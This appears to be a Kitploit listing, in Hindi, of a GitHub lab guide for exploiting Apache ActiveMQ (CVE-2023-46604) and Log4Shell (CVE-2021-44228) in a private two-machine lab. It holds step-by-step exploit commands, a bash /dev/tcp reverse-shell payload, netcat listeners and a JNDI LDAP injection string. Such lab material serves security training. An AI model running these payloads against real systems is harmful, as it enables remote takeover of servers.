Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-Lab — CVE-2021-44228 और CVE-2023-46604 कमजोरियों के शोषण के निर्देश | Kitploit
उपकरण/GitHubGitHub/dcm2406/cve-lab
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHubdcm2406/cve-lab

CVE-Lab

CVE-2021-44228 और CVE-2023-46604 कमजोरियों के शोषण के निर्देश

रिपॉजिटरी देखें
242 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-46604 लैब

यह लैब CVE-2023-46604 की कमजोरियों का शोषण करने के बारे में मार्गदर्शन करता है।

आभार

  • Apache ActiveMQ
  • CVE-2023-46604

पर्यावरण

इस लैब में 2 वर्चुअल मशीनों की स्थापना आवश्यक है। एक Kali Linux मशीन संस्करण 2023.4 और एक Ubuntu मशीन संस्करण 22.04.3 LTS। आप उन्हें यहाँ से डाउनलोड कर सकते हैं:

  • Kali Linux 2023.4
  • Ubuntu 22.04.3 LTS
  • VMware-workstation-17.5.0 for windows
  • VMware-workstation-17.5.0 for linux

मॉडल और सिस्टम आवश्यकताएँ

Kali Linux मशीन पर:

git स्थापित करें

root@kitploit:~
$sudo apt install git

gedit स्थापित करें

root@kitploit:~
$sudo apt install gedit

Ubuntu मशीन पर:

git स्थापित करें

root@kitploit:~
$sudo apt install git

openjdk 18 स्थापित करें

root@kitploit:~
$sudo apt install openjdk-18-jdk

ActiveMQ 5.18.2 पैकेज स्थापित करें

root@kitploit:~
$sudo su
$git clone https://github.com/dcm2406/ApacheActiveMQ
$cd ApacheActiveMQ/
$tar -xf apache-activemq-5.18.2-bin.tar.gz

सर्वर बनाना (activemq सेवा प्रारंभ करना)

Ubuntu मशीन पर एक टर्मिनल विंडो खोलें और नीचे दिए गए कमांड को चलाएँ:

root@kitploit:~
$sudo su
$cd ApacheActiveMQ/apache-activemq-5.18.2/bin/linux-x86-64
$./activemq start

सेवा की स्थिति जाँचें:

root@kitploit:~
$./activemq status

यदि सेवा सफलतापूर्वक प्रारंभ होती है, तो टर्मिनल स्क्रीन पर "ActiveMQ Brocker is running" प्रदर्शित होगा।

आप http://127.0.0.1:8161 पर भी जाकर ActiveMQ ब्रोकर मैनेजर खोल सकते हैं। इसमें होस्टनाम, संस्करण, ID, अप टाइम और कुछ अन्य जानकारी शामिल है।

शोषण

Kali Linux मशीन पर

शोषण प्रक्रिया के लिए संसाधन डाउनलोड करें:

root@kitploit:~
$sudo su
$git clone https://github.com/dcm2406/CVE-2023-46604
$cd CVE-2023-46604
$ls

जैसा कि आप देख सकते हैं, हमारे पास 2 फ़ाइलें हैं: exploit.py और poc.xml:

  • poc.xml फ़ाइल में एक दुर्भावनापूर्ण कोड का टुकड़ा है जो OpenWire प्रोटोकॉल में कमजोरी का फायदा उठाता है।
  • exploit.py फ़ाइल HTTP एन्क्रिप्ट करने और poc.xml फ़ाइल को लक्ष्य मशीन पर Brocker को भेजने के लिए जिम्मेदार है। संसाधन पथ पर एक वेब सर्वर खोलें:
root@kitploit:~
$cd CVE-2023-46604
$python3 -m http.server

exploit.py फ़ाइल के माध्यम से लक्ष्य के सर्वर पर poc.xml फ़ाइल भेजने के लिए एक नया टर्मिनल विंडो खोलें:

root@kitploit:~
$sudo su
$cd CVE-2023-46604
$python3 exploit.py -i 192.168.132.135 -p 61616 --xml http://192.168.132.130:8000/poc.xml

कमांड निष्पादित होने के बाद, लक्ष्य मशीन पर कैलकुलेटर एप्लिकेशन लॉन्च होता है। यह साबित करता है कि कमजोरी का सफलतापूर्वक शोषण किया गया है। हम लक्ष्य मशीन को नियंत्रित करने के लिए एक रिवर्स शेल बनाना जारी रखते हैं।

रिवर्स शेल कनेक्शन सुनने के लिए एक नया टर्मिनल विंडो खोलें:

root@kitploit:~
$sudo su
$nc -nlvp 4444

पिछले टर्मिनल पर वापस जाएँ और poc.xml फ़ाइल को संपादित करें:

root@kitploit:~
$gedit poc.xml

मान gnome-calculator को bash -i >& /dev/tcp/192.168.132.130/4444 0>&1 से बदलें और फ़ाइल को सहेजें।

दुर्भावनापूर्ण कोड फिर से भेज रहे हैं:

root@kitploit:~
$python3 exploit.py -i 192.168.132.135 -p 61616 --xml http://192.168.132.130:8000/poc.xml

इस कमांड का परिणाम यह है कि हमने लक्ष्य मशीन पर रूट शेल प्राप्त कर लिया है। ROOTED!!!

CVE-2021-44228 लैब

आभार

  • Apache log4j
  • CVE-2023-44228 - log4shell

पर्यावरण

इस लैब में 2 वर्चुअल मशीनों की स्थापना आवश्यक है। Kali Linux मशीन संस्करण 2023.4 और Ubuntu मशीन संस्करण 22.04.3 LTS। आप उन्हें यहाँ से डाउनलोड कर सकते हैं:

  • Kali Linux 2023.4
  • Ubuntu 22.04.3 LTS
  • VMware-workstation-17.5.0 for windows
  • VMware-workstation-17.5.0 for linux

मॉडल और सिस्टम आवश्यकताएँ

Kali Linux मशीन पर:

git स्थापित करें

root@kitploit:~
$sudo apt install git

gedit स्थापित करें

root@kitploit:~
$sudo apt install gedit

Ubuntu मशीन पर:

git स्थापित करें

root@kitploit:~
$sudo apt install git

docker स्थापित करें

root@kitploit:~
$sudo apt install docker.io 

वेब सर्वर बनाना

Ubuntu मशीन पर

चरण 1: openjdk डाउनलोड करें

root@kitploit:~
$sudo su
$wget https://www.cs.ait.ac.th/~marikhu/installers/jdk-8u20-linux-x64.tar.gz
$tar -xf jdk-8u20-linux-x64.tar.gz

चरण 2: docker फ़ाइल डाउनलोड और बनाएँ

root@kitploit:~
$sudo su
$git clone https://github.com/dcm2406/web-server-cve44228
root@kitploit:~
$docker build -t cve44228
$docker run --network host cve44228

उपरोक्त कमांड पूरा करने के बाद, हमारे पास एक वेबसाइट है। वेब ब्राउज़ करने के लिए, आप URL: http://<ubuntu_ip>:8080 का उपयोग कर सकते हैं। इस ट्यूटोरियल में, पता कुछ इस प्रकार होगा: http://192.168.132.135:8080

शोषण

Kali Linux मशीन पर, कमजोरी का शोषण करने के लिए आवश्यक संसाधन डाउनलोड करें

poc डाउनलोड करें

root@kitploit:~
$sudo su
$git clone https://github.com/kozmer/log4j-shell-poc
$pip install -r requirement.txt

openjdk डाउनलोड करें

root@kitploit:~
$sudo su
$wget https://www.cs.ait.ac.th/~marikhu/installers/jdk-8u20-linux-x64.tar.gz

//move the openjdk file to the directory containing the poc file
$mv jdk-8u20-linux-x64.tar.gz <path to the directory containing the poc file>

$tar -xf jdk-8u20-linux-x64.tar.gz   //unzip the file

रिवर्स शेल कनेक्शन सुनने के लिए एक नया टर्मिनल खोलें:

root@kitploit:~
$sudo su
$nc -nlvp 9001

poc फ़ाइल के साथ LDAP और HTTP सेवाएँ लॉन्च करें

root@kitploit:~
$sudo su
$cd log4j-shell-poc
$python3 poc.py --userip 192.168.132.130 --lport 9001 --webport 8080

यह कमांड निम्नलिखित के समान परिणाम लौटाएगा

root@kitploit:~
[!] CVE: CVE-2021-44228
Github repo: https://github.com/kozmer/log4j-shell-poc

[+] Exploit java class created success
[+] Setting up LDAP server

[+] Send me: ${jndi:ldap://192.168.132.130:1389/a}

[+] Starting Webserver on port 8080 http://0.0.0.0:8080
Listening on 0.0.0.0:1389

यहाँ, हम केवल उत्पन्न jndi मान में रुचि रखते हैं। एक वेब ब्राउज़र खोलें और पहले बनाई गई वेबसाइट का पता दर्ज करें। jndi मान का उपयोग करके लॉगिन करें। इस समय, netcat टर्मिनल एक कनेक्शन प्राप्त करता है। ROOTED!!!

दस्तावेज़ीकरण

CVE Research Report

सहायता

सहायता के लिए, [email protected] पर ईमेल करें

लेखक

  • @dcm2406
  • @tCu0n9
टूल डाउनलोड करें